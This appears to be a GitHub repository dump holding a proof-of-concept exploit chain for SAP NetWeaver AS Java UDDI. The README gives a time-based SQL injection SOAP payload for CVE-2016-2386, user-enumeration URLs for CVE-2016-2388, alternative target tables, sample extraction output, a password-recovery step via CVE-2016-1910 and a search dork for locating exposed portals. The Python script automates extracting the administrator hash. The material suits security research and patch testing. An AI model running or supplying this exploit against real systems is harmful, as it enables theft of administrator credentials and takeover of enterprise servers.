├── Hardcore-SAP-Penetration-Testing.pdf ├── README.md ├── SQL_injection_CVE-2016-2386.py └── img └── exploit.gif /Hardcore-SAP-Penetration-Testing.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vah13/SAP_exploit/f12aa9cf69606c3c1cda066a4ece2e3b52b9029d/Hardcore-SAP-Penetration-Testing.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SAP_exploit 2 | Author: Vahagn Vardanyan https://twitter.com/vah_13 3 | 4 | Bugs: 5 | 6 | CVE-2016-2386 SQL injection 7 | 8 | CVE-2016-2388 Information disclosure 9 | 10 | CVE-2016-1910 Crypto issue 11 | 12 | 13 | 14 | Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50 15 | 16 | 17 | 18 | ``` 19 | 20 | POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1 21 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 22 | SOAPAction: 23 | Content-Type: text/xml;charset=UTF-8 24 | Host: nw74:50000 25 | Content-Length: 500 26 | 27 | 28 | 29 | 30 | 31 | 1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1 32 | 33 | 34 | 35 | 36 | ``` 37 | 38 | 39 | In SAP test server I have admin user who login is "Administrator" and so I used this payload 40 | 41 | %PRIVATE_DATASOURCE.un:Administrator% 42 | 43 | most SAP's using j2ee_admin username for SAP administrator login 44 | 45 | %PRIVATE_DATASOURCE.un:j2ee_admin% 46 | 47 | You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure) 48 | ``` 49 | 1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat# 50 | 2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages# 51 | ``` 52 | Instead of J2EE_CONFIGENTRY table you can use this tables 53 | ``` 54 | UME_STRINGS_PERM 55 | UME_STRINGS_ACTN 56 | BC_DDDBDP 57 | BC_COMPVERS 58 | TC_WDRR_MRO_LUT 59 | TC_WDRR_MRO_FILES 60 | T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection 61 | T_DOMAIN 62 | T_SESSION 63 | UME_ACL_SUP_PERM 64 | UME_ACL_PERM 65 | UME_ACL_PERM_MEM 66 | ``` 67 | 68 | An example of a working exploit 69 | ``` 70 | C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000 71 | start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit 72 | this may take a few minutes 73 | Found {SHA-512, 10000, 24}M 74 | Found {SHA-512, 10000, 24}MT 75 | Found {SHA-512, 10000, 24}MTI 76 | Found {SHA-512, 10000, 24}MTIz 77 | Found {SHA-512, 10000, 24}MTIzU 78 | Found {SHA-512, 10000, 24}MTIzUV 79 | Found {SHA-512, 10000, 24}MTIzUVd 80 | Found {SHA-512, 10000, 24}MTIzUVdF 81 | Found {SHA-512, 10000, 24}MTIzUVdFY 82 | Found {SHA-512, 10000, 24}MTIzUVdFYX 83 | Found {SHA-512, 10000, 24}MTIzUVdFYXN 84 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk 85 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk8 86 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88 87 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F 88 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx 89 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu 90 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY 91 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC 92 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6 93 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X 94 | ``` 95 | 96 | And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text 97 | ``` 98 | base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX 99 | ``` 100 | 101 | ![CVE-2016-2386](https://github.com/vah13/SAP_exploit/blob/master/img/exploit.gif?raw=true) 102 | 103 | 104 | [PDF whitepaper] https://erpscan.com/wp-content/uploads/2017/12/Hardcore-SAP-Penetration-Testing.pdf 105 | 106 | [SAP-Google-Dork] inurl:/irj/portal 107 | -------------------------------------------------------------------------------- /SQL_injection_CVE-2016-2386.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding=utf-8 3 | """ 4 | Author: Vahagn Vardanyan https://twitter.com/vah_13 5 | 6 | Bugs: 7 | CVE-2016-2386 SQL injection 8 | CVE-2016-2388 Information disclosure 9 | CVE-2016-1910 Crypto issue 10 | 11 | 12 | 13 | Follow HTTP request is a simple PoC for anon time-based SQL injection (CVE-2016-2386) vulnerability in SAP NetWeaver AS Java UDDI 7.11-7.50 14 | 15 | POST /UDDISecurityService/UDDISecurityImplBean HTTP/1.1 16 | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 17 | SOAPAction: 18 | Content-Type: text/xml;charset=UTF-8 19 | Host: nw74:50000 20 | Content-Length: 500 21 | 22 | 23 | 24 | 25 | 26 | 1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%SHA-512%') AND '1'='1 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | In SAP test server I have admin user who login is "Administrator" and so I used this payload 35 | 36 | %PRIVATE_DATASOURCE.un:Administrator% 37 | 38 | most SAP's using j2ee_admin username for SAP administrator login 39 | 40 | %PRIVATE_DATASOURCE.un:j2ee_admin% 41 | 42 | You can get all SAP users login using these URLs (CVE-2016-2388 - information disclosure) 43 | 44 | 1) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Chat# 45 | 2) http:/SAP_IP:SAP_PORT/webdynpro/resources/sap.com/tc~rtc~coll.appl.rtc~wd_chat/Messages# 46 | 47 | Instead of J2EE_CONFIGENTRY table you can use this tables 48 | 49 | UME_STRINGS_PERM 50 | UME_STRINGS_ACTN 51 | BC_DDDBDP 52 | BC_COMPVERS 53 | TC_WDRR_MRO_LUT 54 | TC_WDRR_MRO_FILES 55 | T_CHUNK !!! very big table, if SAP server will not response during 20 seconds then you have SQL injection 56 | T_DOMAIN 57 | T_SESSION 58 | UME_ACL_SUP_PERM 59 | UME_ACL_PERM 60 | UME_ACL_PERM_MEM 61 | 62 | 63 | An example of a working exploit 64 | 65 | C:\Python27\python.exe SQL_injection_CVE-2016-2386.py --host nw74 --port 50000 66 | start to retrieve data from the table UMS_STRINGS from nw74 server using CVE-2016-2386 exploit 67 | this may take a few minutes 68 | Found {SHA-512, 10000, 24}M 69 | Found {SHA-512, 10000, 24}MT 70 | Found {SHA-512, 10000, 24}MTI 71 | Found {SHA-512, 10000, 24}MTIz 72 | Found {SHA-512, 10000, 24}MTIzU 73 | Found {SHA-512, 10000, 24}MTIzUV 74 | Found {SHA-512, 10000, 24}MTIzUVd 75 | Found {SHA-512, 10000, 24}MTIzUVdF 76 | Found {SHA-512, 10000, 24}MTIzUVdFY 77 | Found {SHA-512, 10000, 24}MTIzUVdFYX 78 | Found {SHA-512, 10000, 24}MTIzUVdFYXN 79 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk 80 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk8 81 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88 82 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88F 83 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fx 84 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88Fxu 85 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuY 86 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC 87 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6 88 | Found {SHA-512, 10000, 24}MTIzUVdFYXNk88FxuYC6X 89 | 90 | 91 | And finaly using CVE-2016-1910 (Crypto issue) you can get administrator password in plain text 92 | 93 | base64_decode(MTIzUVdFYXNk88FxuYC6X)=123QWEasdóÁq¹€ºX 94 | 95 | """ 96 | import argparse 97 | import requests 98 | import string 99 | 100 | _magic = "{SHA-512, 10000, 24}" 101 | _wrong_magic = "{SHA-511, 10000, 24}" 102 | _xml = "\r\n \r\n \r\n " \ 104 | "\r\n 1' AND 1=(select COUNT(*) from J2EE_CONFIGENTRY, " \ 105 | "UME_STRINGS where UME_STRINGS.PID like '%PRIVATE_DATASOURCE.un:Administrator%' and UME_STRINGS.VAL like '%{" \ 106 | "0}%') AND '1'='1\r\n \r\n \r\n " 107 | host = "" 108 | port = 0 109 | _dictionary = string.digits + string.uppercase + string.lowercase 110 | 111 | def _get_timeout(_data): 112 | return requests.post("http://{0}:{1}/UDDISecurityService/UDDISecurityImplBean".format(host, port), 113 | headers={ 114 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 " 115 | "Firefox/57.0", 116 | "SOAPAction": "", 117 | "Content-Type": "text/xml;charset=UTF-8" 118 | }, 119 | data=_xml.format(_data)).elapsed.total_seconds() 120 | 121 | 122 | if __name__ == "__main__": 123 | parser = argparse.ArgumentParser() 124 | parser.add_argument('--host') 125 | parser.add_argument('--port') 126 | parser.add_argument('-v') 127 | 128 | args = parser.parse_args() 129 | args_dict = vars(args) 130 | 131 | host = args_dict['host'] 132 | port = args_dict['port'] 133 | 134 | print "start to retrieve data from the table UMS_STRINGS from {0} server using CVE-2016-2386 exploit ".format(host) 135 | _hash = _magic 136 | print "this may take a few minutes" 137 | for i in range(24): # you can change it if like to get full hash 138 | for _char in _dictionary: 139 | if not (args_dict['v'] is None): 140 | print "checking {0}".format(_hash + _char) 141 | if _get_timeout(_hash + _char) > 1.300: # timeout for local SAP server 142 | _hash += _char 143 | print "Found " + _hash 144 | break 145 | -------------------------------------------------------------------------------- /img/exploit.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/vah13/SAP_exploit/f12aa9cf69606c3c1cda066a4ece2e3b52b9029d/img/exploit.gif --------------------------------------------------------------------------------